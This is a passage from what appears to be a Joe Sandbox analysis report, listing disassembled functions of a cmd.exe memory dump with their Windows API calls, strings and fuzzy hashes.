                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EC4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415344529.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: memset$wcscmp
                                                                                          • String ID: %s
                                                                                          • API String ID: 243296809-3043279178
                                                                                          • Opcode ID: 76e25bbe37d1b4078acb033ef5c0999176f7735716d4b3cce97783dd07bc678b
                                                                                          • Instruction ID: 269e0ad1386bfb1413ca2fdf6a876ec6c0e71df9f0a399257e0e315a2ce8a572
                                                                                          • Opcode Fuzzy Hash: 76e25bbe37d1b4078acb033ef5c0999176f7735716d4b3cce97783dd07bc678b
                                                                                          • Instruction Fuzzy Hash: FCA17E32B0AB87A6EB65DB21D8903F963A0FB48749F144036DA4D87795EF3CE649D300
                                                                                          Function 00007FF6A0E799F0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 146COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 00007FF6A0E7CD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6A0E7B9A1,?,?,?,?,00007FF6A0E7D81A), ref: 00007FF6A0E7CDA6
                                                                                            • Part of subcall function 00007FF6A0E7CD90: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6A0E7B9A1,?,?,?,?,00007FF6A0E7D81A), ref: 00007FF6A0E7CDBD
                                                                                          • wcschr.MSVCRT(?,?,?,00007FF6A0E799DD), ref: 00007FF6A0E79A39
                                                                                            • Part of subcall function 00007FF6A0E7DF60: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,00000000,00007FF6A0E7CEAA), ref: 00007FF6A0E7DFB8
                                                                                            • Part of subcall function 00007FF6A0E7DF60: RtlFreeHeap.NTDLL ref: 00007FF6A0E7DFCC
                                                                                            • Part of subcall function 00007FF6A0E7DF60: _setjmp.MSVCRT ref: 00007FF6A0E7E03E
                                                                                          • wcschr.MSVCRT(?,?,?,00007FF6A0E799DD), ref: 00007FF6A0E79AF0
                                                                                          • wcschr.MSVCRT(?,?,?,00007FF6A0E799DD), ref: 00007FF6A0E79B0F
                                                                                            • Part of subcall function 00007FF6A0E796E8: memset.MSVCRT ref: 00007FF6A0E797B2
                                                                                            • Part of subcall function 00007FF6A0E796E8: ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF6A0E79880
                                                                                          • _wcsupr.MSVCRT ref: 00007FF6A0E8B844
                                                                                          • wcscmp.MSVCRT ref: 00007FF6A0E8B86D
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1415065593.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1415044988.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415146997.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EC4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415344529.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: Heap$wcschr$Process$AllocFree_setjmp_wcsuprmemsetwcscmp
                                                                                          • String ID: FOR$ IF
                                                                                          • API String ID: 3663254013-2924197646
                                                                                          • Opcode ID: f7cff311b475cb809cbefbcbc2ea312c8d083385a1c2e3cb15cb3788630bb160
                                                                                          • Instruction ID: aca1efef3432236f12edc8d61b4727c8b43886cbee9c64109d6b98edc9748058
                                                                                          • Opcode Fuzzy Hash: f7cff311b475cb809cbefbcbc2ea312c8d083385a1c2e3cb15cb3788630bb160
                                                                                          • Instruction Fuzzy Hash: EA51AC31F0BB43A6FE58AB25945027966A1FF89B90F584235DA1ED77D2DE3CE805A300
                                                                                          Function 00007FF6A0E7F173 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 119COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • iswdigit.MSVCRT(?,?,00000000,00007FF6A0E81F69,?,?,?,?,?,?,?,00007FF6A0E7286E,00000000,00000000,00000000,00000000), ref: 00007FF6A0E7F0D6
                                                                                          • iswspace.MSVCRT(00000000,00000000,?,00000000,?,00007FF6A0E7E626,?,?,00000000,00007FF6A0E81F69), ref: 00007FF6A0E7F1BA
                                                                                          • wcschr.MSVCRT(?,?,00000000,00007FF6A0E81F69,?,?,?,?,?,?,?,00007FF6A0E7286E,00000000,00000000,00000000,00000000), ref: 00007FF6A0E7F1E7
                                                                                          • iswdigit.MSVCRT(00000000,00000000,?,00000000,?,00007FF6A0E7E626,?,?,00000000,00007FF6A0E81F69), ref: 00007FF6A0E7F1FF
                                                                                          • iswdigit.MSVCRT(?,?,00000000,00007FF6A0E81F69,?,?,?,?,?,?,?,00007FF6A0E7286E,00000000,00000000,00000000,00000000), ref: 00007FF6A0E7F2BB
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1415065593.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1415044988.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415146997.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EC4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415344529.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: iswdigit$iswspacewcschr
                                                                                          • String ID: )$=,;
                                                                                          • API String ID: 1959970872-2167043656
                                                                                          • Opcode ID: 4f4e76ffb3d3d3f1682d86852f25dc45ca8acbfdb86516db9a39298bef1f035d
                                                                                          • Instruction ID: 63000e758ed284127b4c02d36b41793333cbdfab48e23bb45371ff7b1af3f81f
                                                                                          • Opcode Fuzzy Hash: 4f4e76ffb3d3d3f1682d86852f25dc45ca8acbfdb86516db9a39298bef1f035d
                                                                                          • Instruction Fuzzy Hash: FF41CF72E0B253E6FBA08B15E55437976E0BF55751F849035CE8CC23A2DF3CA8A1A700
                                                                                          Function 00007FF6A0E836EC Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 93fileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1415065593.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1415044988.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415146997.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EC4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415344529.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: FileWrite$ByteCharMultiWide$_get_osfhandle
                                                                                          • String ID: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
                                                                                          • API String ID: 3249344982-2616576482
                                                                                          • Opcode ID: 51d05573790b3cf5d3d64b049944166340f1b2bbc10c5d821001f089b8cff74b
                                                                                          • Instruction ID: 6eadcb6025df01fe4c7fa27d6582fe5b37bf05511ad17e51780853cc84aa3839
                                                                                          • Opcode Fuzzy Hash: 51d05573790b3cf5d3d64b049944166340f1b2bbc10c5d821001f089b8cff74b
                                                                                          • Instruction Fuzzy Hash: 47417172619B8296E3108F21A84436ABAA4FB8DBD5F448235EA4D87794CF7DD4199B00
                                                                                          Function 00007FF6A0E86A28 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 80COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • iswdigit.MSVCRT(?,?,00000000,00007FF6A0E868A3,?,?,?,?,?,?,?,00000000,?,00007FF6A0E863F3), ref: 00007FF6A0E86A73
                                                                                          • wcschr.MSVCRT(?,?,00000000,00007FF6A0E868A3,?,?,?,?,?,?,?,00000000,?,00007FF6A0E863F3), ref: 00007FF6A0E86A91
                                                                                          • wcschr.MSVCRT(?,?,00000000,00007FF6A0E868A3,?,?,?,?,?,?,?,00000000,?,00007FF6A0E863F3), ref: 00007FF6A0E86AB0
                                                                                          • wcschr.MSVCRT(?,?,00000000,00007FF6A0E868A3,?,?,?,?,?,?,?,00000000,?,00007FF6A0E863F3), ref: 00007FF6A0E86AE3
                                                                                          • wcschr.MSVCRT(?,?,00000000,00007FF6A0E868A3,?,?,?,?,?,?,?,00000000,?,00007FF6A0E863F3), ref: 00007FF6A0E86B01
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1415065593.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1415044988.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415146997.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EC4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415344529.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: wcschr$iswdigit
                                                                                          • String ID: +-~!$<>+-*/%()|^&=,
                                                                                          • API String ID: 2770779731-632268628
                                                                                          • Opcode ID: 04afb1219d2367be7b294e05ecf67b56e7fd74584ee28e872d0024d55c3108eb
                                                                                          • Instruction ID: b03abbd8d4413db24ecdd0d70715ae4dda8eedd753cfafcf4aadb48eb9535333
                                                                                          • Opcode Fuzzy Hash: 04afb1219d2367be7b294e05ecf67b56e7fd74584ee28e872d0024d55c3108eb
                                                                                          • Instruction Fuzzy Hash: 3931F932A0AA57A5EB549F51E45027977F0FB89F89F558135DA4E83394EF3CE408E310
                                                                                          Function 00007FF6A0E81630 Relevance: 10.7, APIs: 7, Instructions: 208memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,00000000,?,00007FF6A0E814D6,?,?,?,00007FF6A0E7AA22,?,?,?,00007FF6A0E7847E), ref: 00007FF6A0E81673
                                                                                          • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF6A0E814D6,?,?,?,00007FF6A0E7AA22,?,?,?,00007FF6A0E7847E), ref: 00007FF6A0E8168D
                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF6A0E814D6,?,?,?,00007FF6A0E7AA22,?,?,?,00007FF6A0E7847E), ref: 00007FF6A0E81757
                                                                                          • HeapReAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF6A0E814D6,?,?,?,00007FF6A0E7AA22,?,?,?,00007FF6A0E7847E), ref: 00007FF6A0E8176E
                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF6A0E814D6,?,?,?,00007FF6A0E7AA22,?,?,?,00007FF6A0E7847E), ref: 00007FF6A0E81788
                                                                                          • HeapSize.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF6A0E814D6,?,?,?,00007FF6A0E7AA22,?,?,?,00007FF6A0E7847E), ref: 00007FF6A0E8179C
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1415065593.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1415044988.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415146997.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EC4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415344529.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: Heap$Process$Alloc$Size
                                                                                          • String ID:
                                                                                          • API String ID: 3586862581-0
                                                                                          • Opcode ID: de24f60fade2ea1a8e9170476ea6e59d916578871a0233016ef2ac0a8793df42
                                                                                          • Instruction ID: 33246000a8bbe347cd3cb99fae34ea1e1714bfbfd4575d5a17ad16b855c513bc
                                                                                          • Opcode Fuzzy Hash: de24f60fade2ea1a8e9170476ea6e59d916578871a0233016ef2ac0a8793df42
                                                                                          • Instruction Fuzzy Hash: BF917C72A0AB43A2EA158B15E440379B7E4FB49B90F598136DE4D837A0DF3CE449E340
                                                                                          Function 00007FF6A0E886F0 Relevance: 10.7, APIs: 7, Instructions: 154COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1415065593.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1415044988.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415146997.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EC4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415344529.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: ConsoleErrorOpenTitleTokenwcsstr$CloseFormatFreeLastLocalMessageProcessStatusThread
                                                                                          • String ID:
                                                                                          • API String ID: 1313749407-0
                                                                                          • Opcode ID: ee6218c461c646e929341b9db92bfc99d61f95d83b881389c5cff3e0ca217c2e
                                                                                          • Instruction ID: a159577ad3e3f8a6b951397a439d883a06b6326ea77635c09b315f45b4eee1e7
                                                                                          • Opcode Fuzzy Hash: ee6218c461c646e929341b9db92bfc99d61f95d83b881389c5cff3e0ca217c2e
                                                                                          • Instruction Fuzzy Hash: CC51C632E0B6C362FA549B26A904279A6A5FF49B90F685235DD1EC77D1DF3CE844A300
                                                                                          Function 00007FF6A0E7F5D7 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 91COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • iswspace.MSVCRT(00000000,00000000,?,00000000,?,00007FF6A0E7E626,?,?,00000000,00007FF6A0E81F69), ref: 00007FF6A0E7F1BA
                                                                                          • wcschr.MSVCRT(?,?,00000000,00007FF6A0E81F69,?,?,?,?,?,?,?,00007FF6A0E7286E,00000000,00000000,00000000,00000000), ref: 00007FF6A0E7F1E7
                                                                                          • iswdigit.MSVCRT(00000000,00000000,?,00000000,?,00007FF6A0E7E626,?,?,00000000,00007FF6A0E81F69), ref: 00007FF6A0E7F1FF
                                                                                          • iswdigit.MSVCRT(?,?,00000000,00007FF6A0E81F69,?,?,?,?,?,?,?,00007FF6A0E7286E,00000000,00000000,00000000,00000000), ref: 00007FF6A0E7F2BB
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1415065593.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1415044988.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415146997.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EC4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415344529.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: iswdigit$iswspacewcschr
                                                                                          • String ID: )$=,;
                                                                                          • API String ID: 1959970872-2167043656
                                                                                          • Opcode ID: e8a5d63c360e4c13ef561f3ce3dd80187a3c2d8689f5c743dd181e811bfffbc3
                                                                                          • Instruction ID: 0503932f051479bb815cb9a7ece32915a1e1ab91501cf47de9e6529ac61de533
                                                                                          • Opcode Fuzzy Hash: e8a5d63c360e4c13ef561f3ce3dd80187a3c2d8689f5c743dd181e811bfffbc3
                                                                                          • Instruction Fuzzy Hash: 2F41BB75E0B253F6FBA48B10E9483793AE0BF51741F949036C98DC23A2CF3CA860B601
                                                                                          Function 00007FF6A0E991B8 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1415065593.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1415044988.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415146997.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EC4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415344529.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: _wcsnicmpfprintfwcsrchr
                                                                                          • String ID: CMD Internal Error %s$%s$Null environment
                                                                                          • API String ID: 3625580822-2781220306
                                                                                          • Opcode ID: 9798a54e4fc5b33e689a2c9d89df2130ab496e8d723cbfb9f498f453c0192420
                                                                                          • Instruction ID: a79771e769768a57ffc97fdaae4fbe133e6044ca0ce2d491a3eb4a948bb38108
                                                                                          • Opcode Fuzzy Hash: 9798a54e4fc5b33e689a2c9d89df2130ab496e8d723cbfb9f498f453c0192420
                                                                                          • Instruction Fuzzy Hash: C931D031A0A747B2EA149B56B5001BAB2A5BF49BD4F544130DE1D977E2EF3CE885D300
                                                                                          Function 00007FF6A0E75984 Relevance: 9.1, APIs: 6, Instructions: 142COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • _get_osfhandle.MSVCRT ref: 00007FF6A0E93687
                                                                                          • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000000,00008000,?,00000001,00007FF6A0E7260D), ref: 00007FF6A0E936A6
                                                                                          • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000000,00008000,?,00000001,00007FF6A0E7260D), ref: 00007FF6A0E936EB
                                                                                          • _get_osfhandle.MSVCRT ref: 00007FF6A0E93703
                                                                                          • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000000,00008000,?,00000001,00007FF6A0E7260D), ref: 00007FF6A0E93722
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1415065593.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1415044988.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415146997.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EC4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415344529.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: Console$Write_get_osfhandle$Mode
                                                                                          • String ID:
                                                                                          • API String ID: 1066134489-0
                                                                                          • Opcode ID: 989124be994080129bedea4b9ae1d4c283fccc3ce7243235c73d6b8a7e8f68c3
                                                                                          • Instruction ID: 73c792fde4408378a025d8589b62d9eb947dd8efffbc27026893511012d40255
                                                                                          • Opcode Fuzzy Hash: 989124be994080129bedea4b9ae1d4c283fccc3ce7243235c73d6b8a7e8f68c3
                                                                                          • Instruction Fuzzy Hash: 68519E76B0A643B6EA249F31A80457AE6A1FB88BD1F084535DE1A83791DF3CE440EB00
                                                                                          Function 00007FF6A0E9BE30 Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 60COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1415065593.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1415044988.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415146997.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EC4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415344529.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: _wcsicmpwcschr$Heap$AllocProcessiswspace
                                                                                          • String ID: KEYS$LIST$OFF
                                                                                          • API String ID: 411561164-4129271751
                                                                                          • Opcode ID: b81e55aabf7d667b35b65fc1e051a77d11be73535259418c150144ebfd362279
                                                                                          • Instruction ID: 6a3b02b9e64ea46636b1127b0b904e0c9717b4375da18d8aa271bd9dec88a0bf
                                                                                          • Opcode Fuzzy Hash: b81e55aabf7d667b35b65fc1e051a77d11be73535259418c150144ebfd362279
                                                                                          • Instruction Fuzzy Hash: A8217F30A0AA07F2F7549B25A9411B5A6B5FF89790F509631D61EC73F5EF3CE844A700
                                                                                          Function 00007FF6A0E801B8 Relevance: 9.1, APIs: 6, Instructions: 57COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • _get_osfhandle.MSVCRT ref: 00007FF6A0E801C4
                                                                                          • GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF6A0E8E904,?,?,?,?,00000000,00007FF6A0E83491,?,?,?,00007FF6A0E94420), ref: 00007FF6A0E801D6
                                                                                          • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,00007FF6A0E8E904,?,?,?,?,00000000,00007FF6A0E83491,?,?,?,00007FF6A0E94420), ref: 00007FF6A0E80212
                                                                                          • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF6A0E8E904,?,?,?,?,00000000,00007FF6A0E83491,?,?,?,00007FF6A0E94420), ref: 00007FF6A0E80228
                                                                                          • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,00007FF6A0E8E904,?,?,?,?,00000000,00007FF6A0E83491,?,?,?,00007FF6A0E94420), ref: 00007FF6A0E8023C
                                                                                          • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF6A0E8E904,?,?,?,?,00000000,00007FF6A0E83491,?,?,?,00007FF6A0E94420), ref: 00007FF6A0E80251
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1415065593.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1415044988.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415146997.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
